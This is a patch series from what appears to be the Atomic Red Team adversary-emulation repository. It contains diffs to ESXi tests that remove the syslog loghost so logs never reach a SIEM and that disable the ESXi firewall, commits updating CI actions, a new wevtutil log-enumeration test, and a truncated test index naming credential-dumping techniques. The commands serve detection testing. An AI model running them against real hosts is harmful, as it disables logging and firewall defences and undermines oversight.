## Atomic Test #10 - ESXi - Remove Syslog remote IP - An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. +An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. **Supported Platforms:** Windows -**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002 +**auto_generated_guid:** 36c62584-d360-41d6-886f-d194654be7c2 @@ -520,65 +521,67 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder}; #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' | -| username | Username used to log into ESXi | string | root | -| password | Password used to log into ESXI | string | n/a | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| username | Username used to log into ESXi | string | root| +| password | password used to log into ESXI | string | n/a| + -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell - # Extract line with IP address from the syslog configuration output - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt - - # Replace the IP with "0" - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt - - # Extract the IP from the line extracted from findstr - $inputFilePath = "c:\temp\loghost.txt" - $outputFilePath = "c:\temp\loghost_ip.txt" - - $fileContent = Get-Content -Path $inputFilePath -Raw - - if ([string]::IsNullOrWhiteSpace($fileContent)) { - Write-Host "The content is $fileContent" - Write-Host "The file is empty" - } else { - # Use a regular expression to extract IP addresses - $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value - - $output = "esxcli system syslog config set --loghost=" + $ipAddresses - - $output | Out-File -FilePath $outputFilePath -Encoding ascii - - Write-Host "IP addresses extracted and saved to $outputFilePath" +# Extract line with IP address from the syslog configuration output +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt + +# Replace the IP with "0" +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + +# Extract the IP from the line extracted from findstr +$inputFilePath = "c:\temp\loghost.txt" +$outputFilePath = "c:\temp\loghost_ip.txt" + +$fileContent = Get-Content -Path $inputFilePath -Raw + +if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" +} else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" } ``` #### Cleanup Commands: ```powershell - # Re-add the initially extracted IP - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt - - rm c:\temp\loghost_ip.txt - rm c:\temp\loghost.txt +# Re-add the initially extracted IP +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + +rm c:\temp\loghost_ip.txt +rm c:\temp\loghost.txt ``` #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. ##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file +
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 8196b11c2c..4916c495ff 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -50,7 +50,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall) -- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli) +- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi---disable-firewall-via-esxcli) +
@@ -972,12 +973,12 @@ netsh firewall set opmode mode=enable >nul 2>&1
## Atomic Test #23 - ESXi - Disable Firewall via Esxcli - Adversaries may disable the ESXI firewall via ESXCLI +Adversaries may disable the ESXI firewall via ESXCLI **Supported Platforms:** Windows -**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 +**auto_generated_guid:** bac8a340-be64-4491-a0cc-0985cb227f5a @@ -986,34 +987,39 @@ netsh firewall set opmode mode=enable >nul 2>&1 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' | -| username | Username used to log into ESXi | string | root | -| password | Password used to log into ESXI | string | n/a | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| username | username used to log into ESXi | string | root| +| password | password used to log into ESXI | string | n/a| + -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `command_prompt`! ```cmd - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt ``` #### Cleanup Commands: ```cmd - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt ``` #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. ##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file + + + +
From 097661445e79799d61e5344550569d88e7fe2b9c Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 24 Feb 2024 20:17:21 -0500 Subject: [PATCH 19/41] Dependabot update (#2697) * dependabot update * updating atomics count in README.md [ci skip] --------- Co-authored-by: publish bot Co-authored-by: Carrie Roberts --- .github/dependabot.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/dependabot.yml b/.github/dependabot.yml index 91abb11fdf..0c71429862 100644 --- a/.github/dependabot.yml +++ b/.github/dependabot.yml @@ -9,3 +9,8 @@ updates: directory: "/" # Location of package manifests schedule: interval: "weekly" + # Maintain dependencies for GitHub Actions + - package-ecosystem: "github-actions" + directory: "/" + schedule: + interval: "weekly" From 76a970dd843e21b8590bda33fd123e2d89249127 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 18:20:10 -0700 Subject: [PATCH 20/41] Bump actions/setup-python from 4 to 5 (#2702) Bumps [actions/setup-python](https://github.com/actions/setup-python) from 4 to 5. - [Release notes](https://github.com/actions/setup-python/releases) - [Commits](https://github.com/actions/setup-python/compare/v4...v5) --- updated-dependencies: - dependency-name: actions/setup-python dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .github/workflows/generate-counter.yml | 2 +- .github/workflows/validate-atomics.yml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml index 48ffa3eef0..f9d0d9b8dc 100644 --- a/.github/workflows/generate-counter.yml +++ b/.github/workflows/generate-counter.yml @@ -13,7 +13,7 @@ jobs: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: Install poetry run: pipx install poetry - - uses: actions/setup-python@v4 + - uses: actions/setup-python@v5 with: python-version: '3.11.2' cache: 'poetry' diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index c43fd7bc77..a3950021b3 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -14,7 +14,7 @@ jobs: - name: Install poetry run: pipx install poetry - name: setup python3.11 - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 id: setup-python with: python-version: "3.11.2" @@ -46,7 +46,7 @@ jobs: - name: Install poetry run: pipx install poetry - name: setup python3.11 - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 id: setup-python with: python-version: "3.11.2" From 7ef6a1ae5b4ba50ab47db83d68ffc5df5fc0d0af Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:20:54 +0000 Subject: [PATCH 21/41] updating atomics count in README.md [ci skip] From c821a8f785c79dc0af8aa41f6efc6dadefaf3d75 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 18:22:06 -0700 Subject: [PATCH 22/41] Bump actions/stale from 7 to 9 (#2701) Bumps [actions/stale](https://github.com/actions/stale) from 7 to 9. - [Release notes](https://github.com/actions/stale/releases) - [Changelog](https://github.com/actions/stale/blob/main/CHANGELOG.md) - [Commits](https://github.com/actions/stale/compare/v7...v9) --- updated-dependencies: - dependency-name: actions/stale dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Carrie Roberts --- .github/workflows/stale.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index 0065fa5555..84c7b27c86 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -7,7 +7,7 @@ jobs: stale: runs-on: ubuntu-latest steps: - - uses: actions/stale@v7 + - uses: actions/stale@v9 with: stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.' From d1551ed88f0d553463bb141000c467d1c68d443b Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:22:42 +0000 Subject: [PATCH 23/41] updating atomics count in README.md [ci skip] From 6bb1f1db7cf66381128db8c103bae0d1bf599379 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:24:11 -0500 Subject: [PATCH 24/41] Bump actions/upload-artifact from 3 to 4 (#2700) Bumps [actions/upload-artifact](https://github.com/actions/upload-artifact) from 3 to 4. - [Release notes](https://github.com/actions/upload-artifact/releases) - [Commits](https://github.com/actions/upload-artifact/compare/v3...v4) --- updated-dependencies: - dependency-name: actions/upload-artifact dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/validate-atomics.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index a3950021b3..6f54b50026 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -74,7 +74,7 @@ jobs: - name: save labels and reviewers into a file. run: | poetry run python bin/generate_labels.py -t ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}' - - uses: actions/upload-artifact@v3 + - uses: actions/upload-artifact@v4 with: name: labels.json path: pr/ \ No newline at end of file From db7e361b03836817ca3fe11a3d7b5def09fa1591 Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:24:52 +0000 Subject: [PATCH 25/41] updating atomics count in README.md [ci skip] From 7125b098c8fc0a31550950995f7641735ae01e54 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:28:09 -0500 Subject: [PATCH 26/41] Bump hashicorp/setup-terraform from 2 to 3 (#2699) Bumps [hashicorp/setup-terraform](https://github.com/hashicorp/setup-terraform) from 2 to 3. - [Release notes](https://github.com/hashicorp/setup-terraform/releases) - [Changelog](https://github.com/hashicorp/setup-terraform/blob/main/CHANGELOG.md) - [Commits](https://github.com/hashicorp/setup-terraform/compare/v2...v3) --- updated-dependencies: - dependency-name: hashicorp/setup-terraform dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/validate-atomics.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index 6f54b50026..1afec0a559 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -31,7 +31,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - uses: hashicorp/setup-terraform@v2 + - uses: hashicorp/setup-terraform@v3 - name: Terraform fmt id: fmt From 29baf7d62ec0227973bcff3da9d502510b65d047 Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:28:47 +0000 Subject: [PATCH 27/41] updating atomics count in README.md [ci skip] From 664af47cb0342a002e77022815b1397c37e01c0d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:30:07 -0500 Subject: [PATCH 28/41] Bump actions/github-script from 6 to 7 (#2698) Bumps [actions/github-script](https://github.com/actions/github-script) from 6 to 7. - [Release notes](https://github.com/actions/github-script/releases) - [Commits](https://github.com/actions/github-script/compare/v6...v7) --- updated-dependencies: - dependency-name: actions/github-script dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/assign-labels.yml | 4 ++-- .github/workflows/validate-atomics.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/assign-labels.yml b/.github/workflows/assign-labels.yml index 1218c71f20..bf4b3fc782 100644 --- a/.github/workflows/assign-labels.yml +++ b/.github/workflows/assign-labels.yml @@ -11,7 +11,7 @@ jobs: runs-on: ubuntu-latest steps: - name: download-artifact - uses: actions/github-script@v6 + uses: actions/github-script@v7 with: script: | let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ @@ -35,7 +35,7 @@ jobs: run: unzip labels.zip - name: assign-labels-and-reviewers - uses: actions/github-script@v6 + uses: actions/github-script@v7 with: script: | let fs = require('fs'); diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index 1afec0a559..b6c63dd267 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -51,7 +51,7 @@ jobs: with: python-version: "3.11.2" cache: "poetry" - - uses: actions/github-script@v6 + - uses: actions/github-script@v7 id: get_pr_number with: script: | From 8daf92f314f73ca0c0a008e96111b06c4d20a360 Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:30:51 +0000 Subject: [PATCH 29/41] updating atomics count in README.md [ci skip] From 61733d1e9069364a7beb9973ef0f1adcf41f5c47 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 26 Feb 2024 09:07:37 -0600 Subject: [PATCH 30/41] Bump actions/checkout from 3 to 4 (#2705) Bumps [actions/checkout](https://github.com/actions/checkout) from 3 to 4. - [Release notes](https://github.com/actions/checkout/releases) - [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md) - [Commits](https://github.com/actions/checkout/compare/v3...v4) --- updated-dependencies: - dependency-name: actions/checkout dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .github/workflows/generate-counter.yml | 2 +- .github/workflows/generate-docs.yml | 2 +- .github/workflows/validate-atomics.yml | 6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml index f9d0d9b8dc..470c55d2d8 100644 --- a/.github/workflows/generate-counter.yml +++ b/.github/workflows/generate-counter.yml @@ -8,7 +8,7 @@ jobs: generate-counter: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: Install poetry diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml index 12abe48b6a..929318a921 100644 --- a/.github/workflows/generate-docs.yml +++ b/.github/workflows/generate-docs.yml @@ -8,7 +8,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: setup ruby diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index b6c63dd267..72b4d63ec3 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install poetry run: pipx install poetry - name: setup python3.11 @@ -30,7 +30,7 @@ jobs: validate-terraform: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 - uses: hashicorp/setup-terraform@v3 - name: Terraform fmt @@ -42,7 +42,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install poetry run: pipx install poetry - name: setup python3.11 From d7cdd5d68a4ca603adb64fc6cf95806441d2dfd0 Mon Sep 17 00:00:00 2001 From: publish bot Date: Mon, 26 Feb 2024 15:08:34 +0000 Subject: [PATCH 31/41] updating atomics count in README.md [ci skip] From a09cebd1a306081f4cb63c7b0910812655268a25 Mon Sep 17 00:00:00 2001 From: chefengineer <40790013+jj-cmyk@users.noreply.github.com> Date: Tue, 27 Feb 2024 02:16:32 +1100 Subject: [PATCH 32/41] Adding new test for T1654 for Enumerate Windows Security Log (#2704) * Adding new test for T1654 for Enumerate Windows Security Log via WevtUtil Adding new test for T1654 for Enumerate Windows Security Log via WevtUtil * Update T1654.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1654/T1654.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/atomics/T1654/T1654.yaml b/atomics/T1654/T1654.yaml index 723bf0eec0..250f7e9697 100644 --- a/atomics/T1654/T1654.yaml +++ b/atomics/T1654/T1654.yaml @@ -17,3 +17,16 @@ atomic_tests: cleanup_command: powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore" name: powershell elevation_required: true +- name: Enumerate Windows Security Log via WevtUtil + description: |- + WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. + + By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System + as well as any custom logs created by administrators. + + This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt From 05fc04f419c11b34b0fc78b1ce9a22d6f981ebba Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 15:17:09 +0000 Subject: [PATCH 33/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1654/T1654.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1654/T1654.yaml b/atomics/T1654/T1654.yaml index 250f7e9697..4c672a015c 100644 --- a/atomics/T1654/T1654.yaml +++ b/atomics/T1654/T1654.yaml @@ -18,6 +18,7 @@ atomic_tests: name: powershell elevation_required: true - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd description: |- WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c2bd284c0e..a01fb1e73e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1567,3 +1567,4 @@ ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 2d5029f0-ae20-446f-8811-e7511b58e8b6 36c62584-d360-41d6-886f-d194654be7c2 bac8a340-be64-4491-a0cc-0985cb227f5a +fef0ace1-3550-4bf1-a075-9fea55a778dd From 5aef5da2477a35bbb89554a9672be7e347781415 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 15:17:23 +0000 Subject: [PATCH 34/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 14 ++++++++ atomics/Indexes/windows-index.yaml | 14 ++++++++ atomics/T1654/T1654.md | 35 +++++++++++++++++++ 9 files changed, 69 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index bdf1bc9041..f74835998c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View 